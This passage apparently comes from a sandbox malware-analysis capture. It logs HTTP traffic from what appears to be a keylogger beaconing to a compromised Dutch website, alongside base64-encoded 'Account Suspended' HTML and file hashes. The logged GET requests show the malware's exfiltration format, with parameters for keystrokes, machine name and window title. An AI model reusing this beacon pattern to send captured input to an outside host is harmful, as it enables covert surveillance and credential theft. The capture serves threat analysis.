ajF4ZGV2Tm5iVTNWRmZURUwvVzMzcGZIMzFjR1lCcGdXOUxiYTNJYzhDOGlBNzdOTGU1MTR2dThC
UGo2L24zbENkL1ZrZ0tYR2t3WVVRSEFhTSt5UXVuQm1OU3diUlZZaCtrT2NnTWh2UkRCMU1kMjBZ
ZmlSK1VGZnZkSWl6cDJ2MXZWanQwdXNhMXBtTnpBWDJJRmw1L3hhRTlhcVFHU0Q2YnhJMFJaU3cz
dXVGMFlqUUhlcGpNeEhtZDlJZ0MxTmJZMVZTa2RlQjR2WE1IMEtTUVZJdlFmRVJjaU1wY2FGdFc0
SDhpSTBnQjJNemZFY1YzZ0IrSWtmRHRieUNBVGd0SEI3bDNUcktVRzJ5V09lN08yS1lRSVBFN3hG
RDEyWXZ5NlN2cW9MT01mOTVrK0J2Z3FvZ0NGQ3gyMk5kbHRPMWVwWWM3eWNFS1NhSTkrVUFZUEdP
bEtEUVl5eERQOU5wcXYwTktaa1M3R3VOUlFpZzVwdmFZUXdkVHp0alJuQ3JyL2wwYjJVZ08rd1J0
TWlGQ0F6cXBMTDBTbytoV21pNjFObjNhcUtHRXpEZkZybUVvS3FjV1NGRFJPTlNyQVUwaUZZTHJI
VTJSS0IzcStIeERIVDRKS0VlMnByaHhZMWFDUzVsWStIblh1Nk4reDZJSkNSUVFtRUV6K1lqSUUv
eHMvTW1EOHFIUllLNUNBSHVhVFk1amZReEZDL1lvSVFTU1ZhZnJEK1dLNEgwUGl2OFNBVFJaQ2hF
WGlPczM5TC9JWXdpT3hSSGdlRUtjbWJNSTljY0hSQ2R4VWVZYW5GcFFKTUJVRElGeHcxY2hKaUJB
b21rejN4NDNsK251V0dtV2hrUXMwYTZZN1lIVmU3NzJtMXRabFVCRWhLSTlrNm51TEU4YnpLVlNF
Q0VIZUNaU3lzcjA0cUpHblR6c1Z4Sm9Rd203YlBoUTdjemE1RUNHUUdwZzZUbmp6bVdCYlU3dEV4
a2hWdzM2eXozSENtMHFFdkVaOUM3dkRZWmVXQVFobktrUVVHL2k3TkRuQ0wvaHdidkpyNm1pUEtI
VGFPRTU0eHBCR3JsOFJJWEtYMWJrMytBMWFVaEh4VXRlM3NIRXZOU0lwNFJFZEJOT05BOU5PV1lF
d3VxNTRBaFBleDNOYUlRTHdISUlRbFFrUGJ3c1JGcGRtZGIvaEQ4VFNEQ3dUQnU4VzMwc1NJaVM3
UDlOd1o3Q2dBZURqbGFNOWt0QUQwK014d3JzZThYc1RhTW9SSW9DYVptZzNCUWdMcXJIVkNCdTNx
aFczK0FBT2h3cDUyUUlBZlFrQXdvREhLemZORVljazRaUHA1cWg1Q3A0VkZpTDhXTS9DbDhTRjRw
Z3RodnRIbTRxUVVJaVFkWSs1Tk1mdS8yMjhQa3EzTlpOTXFEMVc3ck1ucndKZVFFbUl3S3NhY01J
L1RWT0xsSGpRak0xWVZ0VlEzUndodk9SbzNja2lRNVpPVXpsQ09NeWk5WitMWFJFaFM1aXFySTRR
bnVObGY4b1ZFYks4QTU1NlFRSzBMTnJUajJ0aVdmY0ZuaDBoUElwWUVWR2ptQkFlMmI5NVUzd014
aW9pRXJSbTJudWhkOFFSQ0E4SXdUUkFXMU83UEFzYnRDUHlNTWdKcCsxL0lheHFHQVJ6ckZ0dHBo
VVIrTXZFUFN4KzZtL3BDeEVpM1k3cDQ4NUVTQVZtdWxkdnpTVEt3MmZxSFNHTTVoQlcxSVVJMGYv
TGRPTnRFVUtYR0M5NWpLK1JnNFFCVndObWxlUFpWalR4dW8yNGtXTXJRSGcvblp6eERxbXFGUkZD
Nzk5K2RiRWlyTW9WRVhoVkEwN1krR1dOTU9CQ3hJSXBDZ0NwQVg1S2dIQjZJUUlMSHdFM0hYazJY
UVZzemRTa0dFQ2pVQUJoUExNZFQvdUtMMFJJUThEellPS0p1OThWMDA2TGJTSWt2QnNSbHpCUFlr
SVJJSDE3NDNpRWllbEJUNGlRUmtOSHdVUU1VdFRXWHFzaVF1Z0Jpd2w3M09PclYwUklxLzYrQklQ
UFZWTHJiQVZBdWxRS0l3QU8vOWpVS3lKazUxU21PNXd3aHBIWGFjMEUzRVFFZlJJdTZUZkJZTFFu
L0ozZUNjRmRFN2k0ZHdtSGNrV0VySnNtVTdlSXNHbkx4cFZwVkVUSTRrVk0zVkNVdzErWGRSUFJh
TTBrNjRqTDFMRUZrQkJHUnc3YWQxWkUrQVZINzRYaDhOUU0vZFpNeFZLRGtQQ3lXbWJQSi84dUlR
Si9YYmlMOGJOS3Z2MHZXbExDYjBmUWpSOXp1VTF5K3NTa2pjcXNnUEF6Q1ZHRld6UHBZeEpNOUdB
TVhoR1JpbkQ4NXhrckN4RW9tRVk3STdqLzQwSUV2aldsSjd3RHpqSlp0bWJDVy9jQ2hPUFB0bElD
TUdYSUFYM1FGWVFJUmNJM0NxMlpOazN0WWR1dW5QeElwdXM4Sm9MaTVlMXUyeVdOMWt4ZDNVVjlW
WEFkdm5qbnRJa3NoMVYzQlNlL0RJVUlIQmRSQ01NVjZPbkhydFczYnhjOFZKVm1QUStJRlFtYnR5
VWdlamVtNlZzendhTko1SVFUOXI4QVVGMDQvRG9NSStOaDFaVzVNNGNoSjV5dU5STUFudjdUaDBQ
d1A3NHBUbDlValBaOEdqMTlQWVNuMFMxRlFHMlZmR3ZTUHF4cnA1Mm1CTjZJMjVuMkNUQk9PUkUw
LzZHaVZuOVlOZjhiRkJkNFJVUkZsV3pCdnlCRXFJaTRJOWFreSsycjI5NTk3L1pENjIreEtWZkJ0
Tk02cWFIUkc2MWVyWFBCT2ZPNkhON1VZbEptdXNscFdEVVRkWWFiNEwyejF2NDBoUFBCdnd6cU9s
dVR2aERCVkIyYTRJeXgvNFV4THJ4OGdveWNXMFVFZ080eTJMM0grVWw1WEkvNHZvYzZyWmtBM0Jw
djNuamZTL25oUjc4MUU1NE42dDRPZVd4UXh1a25ndUoxUzg0QVJSNFJ3QXF0bWFDRlpuUmlMMmxi
TStIYUFDNW5wcStJd0YrNmhoZkJXek5ObFc2cUNyR1hSeXphMHlOT2QxRTFmc1lVQzdVVjJKb3A3
WHlYYnN3OTBLWVVJbmpwa1JjZWNXZmtFbWRDQWVoZ3VldVRtTnQrc2hrUmVLZDN2NjduUDljTkRK
SHZvRCsreGR2cG92WEtDcDVTZm9HeEhzajB5RitJd0hVdXM3c21WaDhJSFZHSXdKdEx5N3VONlBl
L3dBbnJCeE9uQWF5SVNMV2tROHdvQkt5UisrZFVUc3VFSytMOHAyQkQ0Zkdkc2ZxaHhHUVRRWmx1
SFVMWHJSc1VGZkJFME9neklscmFSOHZrdzZxblhtdURTRjhSZ1M4dGgrZCtwaGNpOEZKZjFmd2Fw
aTQ0ckZwZnFUWkFuVytKRlJHM2tmOTRaK3NTcWRSMVVJaUkvZGMvQjZOL005V3NpQURPMDBBM1FV
MGhvaFg1UlRkZUNyc3R5VDFXcGhVUlRCZXZCYVY0aXdZSkdHY3RSREMxRnNHYVEzUnRHRmZMNG9z
MzRnNlQrQWtBVDg0YnMwZlgyd2VTODhYN1g2aFhSRERSemR3SFovNUQyaGpqZ2h0M01iNXkxTklO
cStiZVpCdThkODQ2NTd3UFlmTjhwWkJjMGcrSktpS1lpTnI5cjR2MVpydmRidGF6cDE2VFNDT2Za
cHBNaUdENmlWcXIyNzFvVm9rVTZBSjlVNUZHblhJd3c1bUgra0xFaHhJMWNsMjBRQ0dDVGdSTUEv
MytGMmxSWFh0elhoVVJQVFR0OUdRQTZoK2QvMWRFNUFuOUdSSDVvNW13SWdLSHZoQ0JpNWo2MEJj
aThvZStFS0VQclltZytRTk5PdzNQZENMZ3BCVVJPUFExOG1YMVpFeDhwOS8vSWkwcWMzUWk2Q21B
VTFkRXBEOVNBMXRUOTgvR1phZHZmMjlHeFBZUGg5bitNakF1Uk5nL0hjNFdZbThXalQwcEFCTkI3
V2tBYjgxa3o4ZkVvNU5hMHJBUVlVOEtRRVdFUFNrQWFhZm5SUGlYRUdIUENDYmNueHBoSUVQUG5o
WGM5WGtSTnVIaDNDdzhKWHRlZUNWN1pqZy93dWE4WUdsM1h2RFVQeS9jL0F2ZDQvaE5EU3FlZ1FB
QUFBQkpSVTVFcmtKZ2dnPT0pOwogICAgICAgICAgICB9CiAgICAgICAgICAgIC5jb250YWluZXIg
ewogICAgICAgICAgICAgICAgd2lkdGg6IDcwJTsKICAgICAgICAgICAgfQogICAgICAgICAgICAu
c3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAgICBmb250LXNpemU6IDQ1MCU7CiAgICAgICAg
ICAgIH0KICAgICAgICAgICAgLmluZm8taGVhZGluZyB7CiAgICAgICAgICAgICAgICBmb250LXNp
emU6IDIwMCU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLnJlYXNvbi10ZXh0IHsKICAgICAg
ICAgICAgICAgIGZvbnQtc2l6ZTogMTYwJTsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIDwv
c3R5bGU+CiAgICA8L2hlYWQ+CiAgICA8Ym9keT4KICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWlu
ZXIiPgogICAgICAgICAgICA8c3BhbiBjbGFzcz0ic3RhdHVzLXJlYXNvbiI+CiAgICAgICAgICAg
ICAgICA8aSBjbGFzcz0iZmEgZmEtdXNlci10aW1lcyBmYS0yeCI+PC9pPiBBY2NvdW50IFN1c3Bl
bmRlZAogICAgICAgICAgICA8L3NwYW4+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPHNlY3Rpb24g
Y2xhc3M9ImFkZGl0aW9uYWwtaW5mbyI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5l
ciI+CiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJhZGRpdGlvbmFsLWluZm8taXRlbXMiPgog
ICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImluZm8taGVhZGluZyI+CiAgICAgICAgICAg
ICAgICAgICAgICAgIFRoaXMgQWNjb3VudCBoYXMgYmVlbiBzdXNwZW5kZWQuCiAgICAgICAgICAg
ICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0icmVhc29uLXRl
eHQiPgogICAgICAgICAgICAgICAgICAgICAgICBDb250YWN0IHlvdXIgaG9zdGluZyBwcm92aWRl
ciBmb3IgbW9yZSBpbmZvcm1hdGlvbi4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAg
ICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L3NlY3Rpb24+CiAg
ICA8L2JvZHk+CjwvaHRtbD4K
Download
Download
SHA256
17fa2f3324d45c27a318ed51dab739c7f09b573185b76889b955ad2c9ad1d7b8
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=7:53%20PM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 200 OK
Date: Wed, 30 Nov 2016 03:53:57 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Transfer-Encoding: chunked
Content-Type: text/html
Response Peek (128 B)
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
<meta http-equiv="...
12 /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=7:53%20PM text/html post.php 302 Found HTML 379.0 B 09/03/07 09:01:06
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw+
PGhlYWQ+Cjx0aXRsZT4zMDIgRm91bmQ8L3RpdGxlPgo8L2hlYWQ+PGJvZHk+CjxoMT5Gb3VuZDwv
aDE+CjxwPlRoZSBkb2N1bWVudCBoYXMgbW92ZWQgPGEgaHJlZj0iaHR0cDovL3pvbm5lLWxlbmlu
Zy5ubC9jZ2ktc3lzL3N1c3BlbmRlZHBhZ2UuY2dpP3R5cGU9a2V5c3Ryb2tlcyZhbXA7bWFjaGlu
ZW5hbWU9V0lOMSZhbXA7d2luZG93dGl0bGU9QzolNUNVc2VycyU1Q0FkbWluaXN0cmF0b3IlNUNE
ZXNrdG9wJTVDbWFsd2FyZSZhbXA7a2V5c3Ryb2tlc3R5cGVkPSZhbXA7bWFjaGluZXRpbWU9Nzo1
MyUyMFBNIj5oZXJlPC9hPi48L3A+CjwvYm9keT48L2h0bWw+Cg==
Download
Download
SHA256
b0d19f54a3a5873ba13a1710e57704bafb43760cb349fcef5d044f5186fd70b6
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=7:53%20PM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 302 Found
Date: Wed, 30 Nov 2016 03:53:57 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Location: http://zonne-lening.nl/cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=7:53%20PM
Content-Length: 379
Content-Type: text/html; charset=iso-8859-1
Response Peek (128 B)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The doc...
13 /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=7:53%20PM text/html suspendedpage.cgi 200 OK HTML 7.1 KB 09/03/07 15:57:41
PCFET0NUWVBFIGh0bWw+CjxodG1sPgogICAgPGhlYWQ+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJD
b250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJDYWNoZS1jb250cm9sIiBjb250ZW50PSJuby1jYWNoZSI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJQcmFnbWEiIGNvbnRlbnQ9Im5vLWNhY2hlIj4KICAgIDxtZXRhIGh0dHAt
ZXF1aXY9IkV4cGlyZXMiIGNvbnRlbnQ9IjAiPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNv
bnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxl
PkFjY291bnQgU3VzcGVuZGVkPC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJl
Zj0iLy9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9mb250LWF3ZXNvbWUvNC4zLjAvY3NzL2ZvbnQt
YXdlc29tZS5taW4uY3NzIj4KICAgIDxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+CiAgICAgICAgYm9k
eSB7CiAgICAgICAgICAgIGZvbnQtZmFtaWx5OiBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlm
OwogICAgICAgICAgICBmb250LXNpemU6IDE0cHg7CiAgICAgICAgICAgIGxpbmUtaGVpZ2h0OiAx
LjQyODU3MTQyOTsKICAgICAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogI2ZmZmZmZjsKICAgICAg
ICAgICAgY29sb3I6ICMyRjMyMzA7CiAgICAgICAgICAgIHBhZGRpbmc6IDA7CiAgICAgICAgICAg
IG1hcmdpbjogMDsKICAgICAgICB9CiAgICAgICAgc2VjdGlvbiB7CiAgICAgICAgICAgIGRpc3Bs
YXk6IGJsb2NrOwogICAgICAgICAgICBwYWRkaW5nOiAwOwogICAgICAgICAgICBtYXJnaW46IDA7
CiAgICAgICAgfQogICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICBtYXJnaW4tbGVmdDog
YXV0bzsKICAgICAgICAgICAgbWFyZ2luLXJpZ2h0OiBhdXRvOwogICAgICAgICAgICBwYWRkaW5n
OiAwIDEwcHg7CiAgICAgICAgfQogICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAg
ICBiYWNrZ3JvdW5kLXJlcGVhdDogbm8tcmVwZWF0OwogICAgICAgICAgICBiYWNrZ3JvdW5kLWNv
bG9yOiAjMjkzQTRBOwogICAgICAgICAgICBjb2xvcjogI0ZGRkZGRjsKICAgICAgICB9CiAgICAg
ICAgLmFkZGl0aW9uYWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgIHBhZGRpbmc6IDIwcHg7CiAg
ICAgICAgICAgIG1pbi1oZWlnaHQ6IDE5M3B4OwogICAgICAgIH0KICAgICAgICAuaW5mby1oZWFk
aW5nIHsKICAgICAgICAgICAgZm9udC13ZWlnaHQ6IGJvbGQ7CiAgICAgICAgICAgIHRleHQtYWxp
Z246IGxlZnQ7CiAgICAgICAgICAgIHdvcmQtYnJlYWs6IGJyZWFrLWFsbDsKICAgICAgICAgICAg
d2lkdGg6IDEwMCU7CiAgICAgICAgfQogICAgICAgIC5zdGF0dXMtcmVhc29uIHsKICAgICAgICAg
ICAgZm9udC1zaXplOiAyMDAlOwogICAgICAgICAgICBkaXNwbGF5OiBibG9jazsKICAgICAgICAg
ICAgY29sb3I6ICNDQ0NDQ0M7CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAg
ICAgICAgIG1hcmdpbjogMjBweCAwOwogICAgICAgICAgICBmb250LXNpemU6IDE2cHg7CiAgICAg
ICAgfQogICAgICAgIC5pbmZvLWhlYWRpbmcgewogICAgICAgICAgICBmb250LXNpemU6IDE5MCU7
CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAgICAgICAgIGZvbnQtc2l6ZTog
MTQwJTsKICAgICAgICB9CiAgICAgICAgQG1lZGlhIChtaW4td2lkdGg6IDc2OHB4KSB7CiAgICAg
ICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAgICAgICAgcG9zaXRpb246IHJlbGF0
aXZlOwogICAgICAgICAgICAgICAgb3ZlcmZsb3c6IGhpZGRlbjsKICAgICAgICAgICAgICAgIGJh
Y2tncm91bmQtaW1hZ2U6IG5vbmU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLmFkZGl0aW9u
YWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgICAgICBwYWRkaW5nOiAyMHB4OwogICAgICAgICAg
ICB9CiAgICAgICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICAgICAgd2lkdGg6IDkwJTsK
ICAgICAgICAgICAgfQogICAgICAgICAgICAuc3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAg
ICBkaXNwbGF5OiBpbmxpbmU7CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgQG1lZGlh
IChtaW4td2lkdGg6IDk5MnB4KSB7CiAgICAgICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAg
ICAgICAgICAgICAgYmFja2dyb3VuZC1pbWFnZTogdXJsKGRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxp
VkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBUEFBQUFEcUNBTUFBQUNyeGpoZEFBQUF0MUJNVkVVQUFB
QUFBQUQvLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy81K2ZuLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy82K3ZyLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vK2k1ZWRUQUFBQVBYUlNUbE1BQVFFQ0F3UUZCZ2NJQ1FvTERBME9EeEFSRWhN
VUZSWVhHQmthR3h3ZEhoOGdJU0lqSkNVbUp5Z29LU29yTEMwdUx6QXdNVEl6TkRVMk56ZzVIN3gw
WEFBQUNuZEpSRUZVZUFIdFhYbHpHczhSN1RRM0NGa0h4cEt4aEl3dElCd2dJdVlZNHUvL3VWSjJx
cExLRDdROHQyWjd4cEQzbjZza2E5LzJiTTlNdno2b0dFeVhGb0tIZm1oZW9ld3g5Y1llaFZ1UEhN
VDRqcGh5QnROSHhIUW1ER2dCdlpqWEJ1V04yZ29nYlB5NlJ0Y09lak5QeEZrYitDRVloSENmbUo2
RFFTaGZFR2ZNdDcxRk9QZ3BFMVBIT01URVk4b1ozeUNyMlV0aUlucUVmdGozaUxNMThBZnN1L3hL
djlCNFFVenNWMVhLRlR6RFBHK0xmb0xwRS9Makpuek8wOFFDQXVnTGFsS2VxUC9tRW1XNlFqK0JQ
SUU3SVltVHl3MU1Gd2Jha3NheWJTeERDQTRTVEYrd2c4ckg3RXpNd3FOaWJZMzhtbHZYS0RkVTVw
REgzVFJrbDQwdnhKa1orRE8yTnUvM0hueUM3dDE1b2JHQnRxUkZSWG82KzBaNVlRaDVMSGQ5WUdX
T3NGKzlJczVvUVhjdFpLYnZkQUF0YkhITTgrR0xmb2pXZElnUGZmN1lpZlJUTmlabXVzVyt3OGZE
ajF4ZGV2Tm5iVTNWRmZURUwvVzMzcGZIMzFjR1lCcGdXOUxiYTNJYzhDOGlBNzdOTGU1MTR2dThC
UGo2L24zbENkL1ZrZ0tYR2t3WVVRSEFhTSt5UXVuQm1OU3diUlZZaCtrT2NnTWh2UkRCMU1kMjBZ
ZmlSK1VGZnZkSWl6cDJ2MXZWanQwdXNhMXBtTnpBWDJJRmw1L3hhRTlhcVFHU0Q2YnhJMFJaU3cz
dXVGMFlqUUhlcGpNeEhtZDlJZ0MxTmJZMVZTa2RlQjR2WE1IMEtTUVZJdlFmRVJjaU1wY2FGdFc0
SDhpSTBnQjJNemZFY1YzZ0IrSWtmRHRieUNBVGd0SEI3bDNUcktVRzJ5V09lN08yS1lRSVBFN3hG
RDEyWXZ5NlN2cW9MT01mOTVrK0J2Z3FvZ0NGQ3gyMk5kbHRPMWVwWWM3eWNFS1NhSTkrVUFZUEdP
bEtEUVl5eERQOU5wcXYwTktaa1M3R3VOUlFpZzVwdmFZUXdkVHp0alJuQ3JyL2wwYjJVZ08rd1J0
TWlGQ0F6cXBMTDBTbytoV21pNjFObjNhcUtHRXpEZkZybUVvS3FjV1NGRFJPTlNyQVUwaUZZTHJI
VTJSS0IzcStIeERIVDRKS0VlMnByaHhZMWFDUzVsWStIblh1Nk4reDZJSkNSUVFtRUV6K1lqSUUv
eHMvTW1EOHFIUllLNUNBSHVhVFk1amZReEZDL1lvSVFTU1ZhZnJEK1dLNEgwUGl2OFNBVFJaQ2hF
WGlPczM5TC9JWXdpT3hSSGdlRUtjbWJNSTljY0hSQ2R4VWVZYW5GcFFKTUJVRElGeHcxY2hKaUJB
b21rejN4NDNsK251V0dtV2hrUXMwYTZZN1lIVmU3NzJtMXRabFVCRWhLSTlrNm51TEU4YnpLVlNF
Q0VIZUNaU3lzcjA0cUpHblR6c1Z4Sm9Rd203YlBoUTdjemE1RUNHUUdwZzZUbmp6bVdCYlU3dEV4
a2hWdzM2eXozSENtMHFFdkVaOUM3dkRZWmVXQVFobktrUVVHL2k3TkRuQ0wvaHdidkpyNm1pUEtI
VGFPRTU0eHBCR3JsOFJJWEtYMWJrMytBMWFVaEh4VXRlM3NIRXZOU0lwNFJFZEJOT05BOU5PV1lF
d3VxNTRBaFBleDNOYUlRTHdISUlRbFFrUGJ3c1JGcGRtZGIvaEQ4VFNEQ3dUQnU4VzMwc1NJaVM3
UDlOd1o3Q2dBZURqbGFNOWt0QUQwK014d3JzZThYc1RhTW9SSW9DYVptZzNCUWdMcXJIVkNCdTNx
aFczK0FBT2h3cDUyUUlBZlFrQXdvREhLemZORVljazRaUHA1cWg1Q3A0VkZpTDhXTS9DbDhTRjRw
Z3RodnRIbTRxUVVJaVFkWSs1Tk1mdS8yMjhQa3EzTlpOTXFEMVc3ck1ucndKZVFFbUl3S3NhY01J
L1RWT0xsSGpRak0xWVZ0VlEzUndodk9SbzNja2lRNVpPVXpsQ09NeWk5WitMWFJFaFM1aXFySTRR
bnVObGY4b1ZFYks4QTU1NlFRSzBMTnJUajJ0aVdmY0ZuaDBoUElwWUVWR2ptQkFlMmI5NVUzd014
aW9pRXJSbTJudWhkOFFSQ0E4SXdUUkFXMU83UEFzYnRDUHlNTWdKcCsxL0lheHFHQVJ6ckZ0dHBo
VVIrTXZFUFN4KzZtL3BDeEVpM1k3cDQ4NUVTQVZtdWxkdnpTVEt3MmZxSFNHTTVoQlcxSVVJMGYv
TGRPTnRFVUtYR0M5NWpLK1JnNFFCVndObWxlUFpWalR4dW8yNGtXTXJRSGcvblp6eERxbXFGUkZD
Nzk5K2RiRWlyTW9WRVhoVkEwN1krR1dOTU9CQ3hJSXBDZ0NwQVg1S2dIQjZJUUlMSHdFM0hYazJY
UVZzemRTa0dFQ2pVQUJoUExNZFQvdUtMMFJJUThEellPS0p1OThWMDA2TGJTSWt2QnNSbHpCUFlr
SVJJSDE3NDNpRWllbEJUNGlRUmtOSHdVUU1VdFRXWHFzaVF1Z0Jpd2w3M09PclYwUklxLzYrQklQ
UFZWTHJiQVZBdWxRS0l3QU8vOWpVS3lKazUxU21PNXd3aHBIWGFjMEUzRVFFZlJJdTZUZkJZTFFu
L0ozZUNjRmRFN2k0ZHdtSGNrV0VySnNtVTdlSXNHbkx4cFZwVkVUSTRrVk0zVkNVdzErWGRSUFJh
TTBrNjRqTDFMRUZrQkJHUnc3YWQxWkUrQVZINzRYaDhOUU0vZFpNeFZLRGtQQ3lXbWJQSi84dUlR
Si9YYmlMOGJOS3Z2MHZXbExDYjBmUWpSOXp1VTF5K3NTa2pjcXNnUEF6Q1ZHRld6UHBZeEpNOUdB
TVhoR1JpbkQ4NXhrckN4RW9tRVk3STdqLzQwSUV2aldsSjd3RHpqSlp0bWJDVy9jQ2hPUFB0bElD
TUdYSUFYM1FGWVFJUmNJM0NxMlpOazN0WWR1dW5QeElwdXM4Sm9MaTVlMXUyeVdOMWt4ZDNVVjlW
WEFkdm5qbnRJa3NoMVYzQlNlL0RJVUlIQmRSQ01NVjZPbkhydFczYnhjOFZKVm1QUStJRlFtYnR5
VWdlamVtNlZzendhTko1SVFUOXI4QVVGMDQvRG9NSStOaDFaVzVNNGNoSjV5dU5STUFudjdUaDBQ
d1A3NHBUbDlValBaOEdqMTlQWVNuMFMxRlFHMlZmR3ZTUHF4cnA1Mm1CTjZJMjVuMkNUQk9PUkUw
LzZHaVZuOVlOZjhiRkJkNFJVUkZsV3pCdnlCRXFJaTRJOWFreSsycjI5NTk3L1pENjIreEtWZkJ0
Tk02cWFIUkc2MWVyWFBCT2ZPNkhON1VZbEptdXNscFdEVVRkWWFiNEwyejF2NDBoUFBCdnd6cU9s
dVR2aERCVkIyYTRJeXgvNFV4THJ4OGdveWNXMFVFZ080eTJMM0grVWw1WEkvNHZvYzZyWmtBM0Jw
djNuamZTL25oUjc4MUU1NE42dDRPZVd4UXh1a25ndUoxUzg0QVJSNFJ3QXF0bWFDRlpuUmlMMmxi
TStIYUFDNW5wcStJd0YrNmhoZkJXek5ObFc2cUNyR1hSeXphMHlOT2QxRTFmc1lVQzdVVjJKb3A3
WHlYYnN3OTBLWVVJbmpwa1JjZWNXZmtFbWRDQWVoZ3VldVRtTnQrc2hrUmVLZDN2NjduUDljTkRK
SHZvRCsreGR2cG92WEtDcDVTZm9HeEhzajB5RitJd0hVdXM3c21WaDhJSFZHSXdKdEx5N3VONlBl
L3dBbnJCeE9uQWF5SVNMV2tROHdvQkt5UisrZFVUc3VFSytMOHAyQkQ0Zkdkc2ZxaHhHUVRRWmx1
SFVMWHJSc1VGZkJFME9neklscmFSOHZrdzZxblhtdURTRjhSZ1M4dGgrZCtwaGNpOEZKZjFmd2Fw
aTQ0ckZwZnFUWkFuVytKRlJHM2tmOTRaK3NTcWRSMVVJaUkvZGMvQjZOL005V3NpQURPMDBBM1FV
MGhvaFg1UlRkZUNyc3R5VDFXcGhVUlRCZXZCYVY0aXdZSkdHY3RSREMxRnNHYVEzUnRHRmZMNG9z
MzRnNlQrQWtBVDg0YnMwZlgyd2VTODhYN1g2aFhSRERSemR3SFovNUQyaGpqZ2h0M01iNXkxTklO
cStiZVpCdThkODQ2NTd3UFlmTjhwWkJjMGcrSktpS1lpTnI5cjR2MVpydmRidGF6cDE2VFNDT2Za
cHBNaUdENmlWcXIyNzFvVm9rVTZBSjlVNUZHblhJd3c1bUgra0xFaHhJMWNsMjBRQ0dDVGdSTUEv
MytGMmxSWFh0elhoVVJQVFR0OUdRQTZoK2QvMWRFNUFuOUdSSDVvNW13SWdLSHZoQ0JpNWo2MEJj
aThvZStFS0VQclltZytRTk5PdzNQZENMZ3BCVVJPUFExOG1YMVpFeDhwOS8vSWkwcWMzUWk2Q21B
VTFkRXBEOVNBMXRUOTgvR1phZHZmMjlHeFBZUGg5bitNakF1Uk5nL0hjNFdZbThXalQwcEFCTkI3
V2tBYjgxa3o4ZkVvNU5hMHJBUVlVOEtRRVdFUFNrQWFhZm5SUGlYRUdIUENDYmNueHBoSUVQUG5o
